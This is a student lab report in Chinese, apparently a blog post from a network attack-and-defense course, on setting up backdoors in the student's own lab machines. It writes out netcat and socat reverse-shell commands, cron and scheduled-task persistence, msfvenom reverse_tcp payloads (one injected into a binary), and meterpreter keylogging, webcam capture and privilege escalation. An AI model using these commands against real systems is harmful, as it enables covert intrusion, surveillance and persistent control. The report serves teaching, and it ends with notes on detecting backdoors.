20222415 2024-2025-1 《网络与系统攻防技术》实验二实验报告

1.实验内容

本周学习了后门技术,包括后门的概念和实现方式,学习了后门攻击的过程和实践;并且初步学习了免杀。

2.实验过程

2.1使用netcat获取主机操作Shell,cron启动某项任务
(1)使用netcat获取主机操作
虚拟机登录root,主机在cmd窗口输入ncat.exe -l -p 8888
Linux虚机输入指令nc 192.168.3.48 8888 -e /bin/sh

在主机输入ls,成功显示文件目录,代表主机成功连接虚拟机shell。

(2)cron启动定时任务
在虚拟机输入crontab -e执行文字编辑器来设定定时任务
输入指令30 * * * * /bin/netcat 192.168.3.48 8888 -e /bin/sh并保存,输入crontab -l查看时程表

打开kali的/var/spool/cron/crontabs文件夹,可以看到多了一个root文件

在虚拟机中输入echo "* * * * * echo "20222415" > /home/tianruqi/2415.text" > /var/spool/cron/crontabs/root,每分钟将2415.txt内容覆盖为20222415。


启动成功。
2.2使用socat获取主机操作Shell, 任务计划启动
(1)安装socat
主机下载socat后在cmd窗口输入socat.exe tcp-listen:8888 exec:cmd.exe,pty,stderr

(2)前期准备
提前准备一个程序,代码如下:

虚拟机输入socat - tcp:192.168.1.114:8888进行连接

(3)启动任务计划
主机在cmd窗口输入命令schtasks /create /sc minute /mo 1 /tn "ruki20222415" /tr C:\Users\26704\Desktop\wlgf\trq20222415\trq20222415.exe
打开主机的任务管理器,可以看到任务名

2.3使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell
(1)生成后门文件
在虚拟机中输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.115 LPORT=8888 -f exe > 2415backdoor.exe

(2)将后门文件传给主机
在主机输入命令ncat.exe -lv 8888 > "C:\Users\26704\Desktop\wlgf\\2415backdoor.exe"

将文件放入kali中

(3)配置监听模块
在虚拟机输入msfconsole对监听模块进行配置

输入exploit运行监听模块,并在主机运行2415backdoor.exe
返回虚拟机查看,输入ls查看主机目录

2.4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权
(1)在2.3完成之后,继续在exploit
输入keyscan_start获取键盘输入

输入screenshot截屏

输入webcam_snap拍照

(2)提权
输入命令backgrounduse exploit/windows/local/askset session 1set FILENAME WindowsUpdater.exerun进行提权
2.5使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
在虚拟机输入命令msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.114 LPORT=8888 -x /root/tianruqi/Desktop/pwn20222415 -f elf > pwn2415

输入chmod a+x pwn2415给pwn2415给予权限并重复监听过程
在虚拟机打开另一个shell,运行pwn2415

返回第一个shell输入ls测试连接

成功连接

3.问题及解决方案

  • 问题1:cron没有成功设定定时任务
  • 问题1解决方案:一开是设置好后没有成功,我猜测是过程中哪里没有输对,于是我尝试重新设一下,但是在我重新做的过程中第一次设的定时任务突然就自己开始启动了,我猜测一开始没成功是因为没到设定的时刻,但是没有进行验证。

4.学习感悟、思考等

这次实验参考了其他同学的实验报告,但是即使是参考了实验报告,我在实验过程中也出现了很多的问题,比如命令输入的不对,或者压根找不到错误在哪,但是重新做一遍又好了。这次实验最让我感受到的就是我电脑的防火墙真的很把我的电脑保护得很好,我在做完实验后就把防火墙给打开了,立马就发现实验时在电脑上创建的文件被防火墙给清理了。
对于本次实验我还不理解的问题,我也会持续不断地学习,希望能在后面的学习中完全理解这个实验。

5.回答问题

(1)例举你能想到的一个后门进入到你系统中的可能方式?
下载并安装了一个包含后门程序的恶意软件时,这个后门程序就会随之进入我的系统。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
win:
通过启动任务计划程序
开机自启动
与其他程序捆绑运行
linux:
通过cron启动
与其他程序捆绑运行
(3)Meterpreter有哪些给你映像深刻的功能?
远程控制,Meterpreter允许攻击者通过网络与远程受感染的计算机建立连接,并获取对该计算机的完全控制权限。这使得攻击者可以远程执行各种命令、查看文件、修改系统设置等。
(4)如何发现自己有系统有没有被安装后门?
通过任务管理器或命令行工具检查系统中的进程和服务;
使用网络监控工具查看系统的网络连接状态。如果发现未知或可疑的网络连接,可能表明后门程序正在尝试与外部通信;
使用专业的安全扫描工具。

posted @ 2024-10-23 21:13  RukiTing  阅读(1)  评论(0编辑  收藏  举报